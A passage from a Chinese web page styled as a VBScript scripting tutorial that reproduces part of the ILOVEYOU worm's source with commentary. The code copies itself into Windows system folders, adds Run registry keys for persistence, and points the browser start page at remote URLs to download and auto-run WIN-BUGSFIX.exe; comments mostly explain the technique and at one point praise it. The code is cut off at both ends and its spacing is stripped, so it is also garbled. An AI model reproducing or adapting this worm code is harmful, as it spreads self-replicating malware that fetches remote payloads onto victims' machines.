快速业务通道

vbscript,jscript脚本编程教学(1)

作者 佚名 来源 ASP编程 浏览 发布时间 2013-07-09
extFile(WScript.ScriptFullname,1)''返回当前脚本的完整路径
vbscopy=file.ReadAll
main()
''注释-程序初始化完成。

submain()
OnErrorResumeNext
dimwscr,rr
setwscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptin
gHost\Settings\Timeout")
if(rr>=1)then
wscr.RegWrite"HKEY_CURRENT_USER\Software\Microsoft\WindowsScripting
Host\Settings\Timeout",0,"REG_DWORD"
''注释-防止操作超时造成的程序终止。
''应该说,编写病毒的程序员考虑到了可能发生的问题,这一点值得所有的编程
者借鉴。
endif
Setdirwin=fso.GetSpecialFolder(0)
Setdirsystem=fso.GetSpecialFolder(1)
Setdirtemp=fso.GetSpecialFolder(2)
''获取系统关键文件夹的名称
''VB编程时可以用。

Setc=fso.GetFile(WScript.ScriptFullName)''返回当前脚本的完整路径
c.Copy(dirsystem&"\MSKernel32.vbs")''Copiesaspecifiedfileorfolderfromonelocationtoanother.
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
''复制自身到关键目录中备用。
''文件名并不是很好。太容易被发现了。

regruns()
html()
spreadtoemail()
listadriv()
endsub


subregruns()
''修改注册表,以便自动装载病毒程序
''预防:经常检查注册表中的这一分支。
''已知的方法还有把HTA放入Startup文件夹。病毒程序使用的方法更先进,
''因为它不会因为语言问题而失效。
OnErrorResumeNext
Dimnum,downread
regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\InternetExplore
r\DownloadDirectory")
if(downread="")then
downread="c:\"
endif
if(fileexist(dirsystem&"\WinFAT32.exe")=1)then
Randomize
num=Int((4*Rnd)+1)
ifnum=1then
regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage",
"http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseifnum=2then
regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage",
"http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseifnum=3then
regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage",
"http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseifnum=4then
regcreate"HKCU\Software\Microsoft\InternetExplorer\Main\StartPage",
"http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B
UGSFIX.exe"
endif
endif
if(fileexist(downread&"\WIN-BUGSFIX.exe")=0)then
regcreate"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersio
n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate"HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main
\StartPage","about:blank"
endif
endsub

subfolderlist(folderspec)
''遍历文件夹
OnErrorResumeNext
dimf,f1,sf
setf=fso.GetFolder(folderspec)
setsf=f.SubFolders''得到某一特定文件夹的所有子文件夹,包括系统隐藏文件夹
foreachf1insf

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号